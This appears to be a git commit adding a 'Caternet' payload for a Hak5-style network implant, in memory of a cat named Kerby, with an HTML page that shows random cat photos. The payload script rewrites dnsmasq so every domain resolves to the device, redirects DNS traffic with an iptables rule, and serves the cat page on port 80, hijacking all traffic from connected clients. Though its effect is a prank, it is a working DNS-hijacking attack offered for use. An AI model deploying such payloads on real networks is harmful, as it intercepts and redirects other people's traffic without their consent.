added caternet payload
|
@ -0,0 +1,23 @@
|
|||
<script language="JavaScript">
|
||||
<!--
|
||||
function random_img(){
|
||||
var kerby=new Array()
|
||||
kerby[1]="kerby1.jpg"
|
||||
kerby[2]="kerby2.jpg"
|
||||
kerby[3]="kerby3.jpg"
|
||||
kerby[4]="kerby4.jpg"
|
||||
kerby[5]="kerby5.jpg"
|
||||
kerby[6]="kerby6.jpg"
|
||||
kerby[7]="kerby7.jpg"
|
||||
kerby[8]="kerby8.jpg"
|
||||
kerby[9]="kerby9.jpg"
|
||||
|
||||
|
||||
var ry=Math.floor(Math.random()*kerby.length)
|
||||
if (ry==0)
|
||||
ry=1
|
||||
document.write('<img src="'+kerby[ry]+'">')
|
||||
}
|
||||
random_img()
|
||||
//-->
|
||||
</script>
|
After Width: | Height: | Size: 95 KiB |
After Width: | Height: | Size: 93 KiB |
After Width: | Height: | Size: 96 KiB |
After Width: | Height: | Size: 55 KiB |
After Width: | Height: | Size: 62 KiB |
After Width: | Height: | Size: 81 KiB |
After Width: | Height: | Size: 64 KiB |
After Width: | Height: | Size: 66 KiB |
After Width: | Height: | Size: 53 KiB |
|
@ -0,0 +1,14 @@
|
|||
# Title: Caternet
|
||||
# Author: Hak5Darren
|
||||
# Version: 1.0
|
||||
# Description: Forwards all traffic to local webserver hosting cat photos.
|
||||
# Props: In loving memory of Hak5Kerby
|
||||
|
||||
LED SETUP
|
||||
NETMODE NAT
|
||||
echo "address=/#/172.16.32.1" > /tmp/dnsmasq.address
|
||||
/etc/init.d/dnsmasq restart
|
||||
|
||||
LED ATTACK
|
||||
iptables -A PREROUTING -t nat -i eth0 -p udp --dport 53 -j REDIRECT --to-port 53
|
||||
python -m SimpleHTTPServer 80
|